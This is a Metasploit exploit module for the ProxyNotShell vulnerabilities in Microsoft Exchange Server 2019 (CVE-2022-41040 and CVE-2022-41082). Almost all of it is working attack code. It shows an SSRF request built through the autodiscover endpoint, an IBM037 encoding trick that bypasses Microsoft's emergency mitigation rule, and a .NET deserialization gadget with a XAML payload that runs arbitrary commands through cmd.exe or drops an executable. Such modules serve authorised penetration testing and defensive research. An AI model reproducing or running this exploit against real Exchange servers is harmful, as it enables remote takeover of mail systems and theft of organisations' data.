proxynotshell/exchange_proxynotshell_rce.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HTTP::Exchange
  include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft Exchange ProxyNotShell RCE',
        'Description' => %q{
          This module chains two vulnerabilities on Microsoft Exchange Server
          that, when combined, allow an authenticated attacker to interact with
          the Exchange Powershell backend (CVE-2022-41040), where a
          deserialization flaw can be leveraged to obtain code execution
          (CVE-2022-41082). This exploit only support Exchange Server 2019.

          These vulnerabilities were patched in November 2022.
        },
        'Author' => [
          'Orange Tsai', # Discovery of ProxyShell SSRF
          'Spencer McIntyre', # Metasploit module
          'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis
          'Piotr Bazydło', # Vulnerability analysis
          'Rich Warren', # EEMS bypass via ProxyNotRelay
          'Soroush Dalili' # EEMS bypass
        ],
        'References' => [
          [ 'CVE', '2022-41040' ], # ssrf
          [ 'CVE', '2022-41082' ], # rce
          [ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ],
          [ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ],
          [ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ],
          [ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ]
        ],
        'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08
        'License' => MSF_LICENSE,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'Platform' => ['windows'],
        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
        'Privileged' => true,
        'Targets' => [
          [
            'Windows Dropper',
            {
              'Platform' => 'windows',
              'Arch' => [ARCH_X64, ARCH_X86],
              'Type' => :windows_dropper
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => 'windows',
              'Arch' => [ARCH_CMD],
              'Type' => :windows_command
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'AKA' => ['ProxyNotShell'],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    register_options([
      OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]),
      OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),
      OptString.new('DOMAIN', [ false, 'The domain to authenticate to' ])
    ])

    register_advanced_options([
      OptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]])
    ])
  end

  def check
    @ssrf_email ||= Faker::Internet.email
    res = send_http('GET', '/mapi/nspi/')
    return CheckCode::Unknown if res.nil?
    return CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401
    return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'

    # actually run the powershell cmdlet and see if it works, this will fail if:
    #   * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN)
    #   * the exchange emergency mitigation service M1 rule is in place
    return CheckCode::Safe unless execute_powershell('Get-Mailbox')

    CheckCode::Vulnerable
  rescue Msf::Exploit::Failed => e
    CheckCode::Safe(e.to_s)
  end

  def ibm037(string)
    string.encode('IBM037').force_encoding('ASCII-8BIT')
  end

  def send_http(method, uri, opts = {})
    opts[:authentication] = {
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD'],
      'preferred_auth' => 'NTLM'
    }

    if uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1'
      uri = "/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' + @ssrf_email)}"
      opts[:headers] = {
        'X-Up-Devcap-Post-Charset' => 'IBM037',
        # technique needs the "UP" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362
        'User-Agent' => "UP #{datastore['UserAgent']}"
      }
    else
      uri = "/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}"
    end

    super(method, uri, opts)
  end

  def exploit
    # if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not
    # work on Exchange Server 2016
    if datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version)
      vprint_status("Detected Exchange version: #{version}")
      if version < Rex::Version.new('15.2')
        fail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)')
      end
    end

    @ssrf_email ||= Faker::Internet.email

    case target['Type']
    when :windows_command
      vprint_status("Generated payload: #{payload.encoded}")
      execute_command(payload.encoded)
    when :windows_dropper
      execute_cmdstager({ linemax: 7_500 })
    end
  end

  def execute_command(cmd, _opts = {})
    xaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root
      <ResourceDictionary
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:System="clr-namespace:System;assembly=mscorlib"
        xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
        <ObjectDataProvider x:Key="LaunchCalch" ObjectType="{x:Type Diag:Process}" MethodName="Start">
          <ObjectDataProvider.MethodParameters>
            <System:String>cmd.exe</System:String>
            <System:String>/c #{cmd.encode(xml: :text)}</System:String>
          </ObjectDataProvider.MethodParameters>
        </ObjectDataProvider>
      </ResourceDictionary>
    XAML

    identity = Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root
      <Obj N="V" RefId="14">
        <TN RefId="1">
        <T>System.ServiceProcess.ServiceController</T>
          <T>System.Object</T>
        </TN>
        <ToString>Object</ToString>
        <Props>
          <S N="Name">Type</S>
          <Obj N="TargetTypeForDeserialization">
            <TN RefId="1">
              <T>System.Exception</T>
              <T>System.Object</T>
            </TN>
            <MS>
              <BA N="SerializationData">
                #{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)}
              </BA>
            </MS>
          </Obj>
        </Props>
        <S>
          <![CDATA[#{xaml}]]>
        </S>
      </Obj>
    IDENTITY

    execute_powershell('Get-Mailbox', args: [
      { name: '-Identity', value: identity }
    ])
  end
end

class XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream
  include Msf::Util::DotNetDeserialization

  def self.generate
    from_values([
      Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),
      Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(
        class_info: Types::General::ClassInfo.new(
          obj_id: 1,
          name: 'System.UnitySerializationHolder',
          member_names: %w[Data UnityType AssemblyName]
        ),
        member_type_info: Types::General::MemberTypeInfo.new(
          binary_type_enums: %i[String Primitive String],
          additional_infos: [ 8 ]
        ),
        member_values: [
          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
            obj_id: 2,
            string: 'System.Windows.Markup.XamlReader'
          )),
          4,
          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
            obj_id: 3,
            string: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'
          ))
        ]
      ),
      Types::RecordValues::MessageEnd.new
    ])
  end
end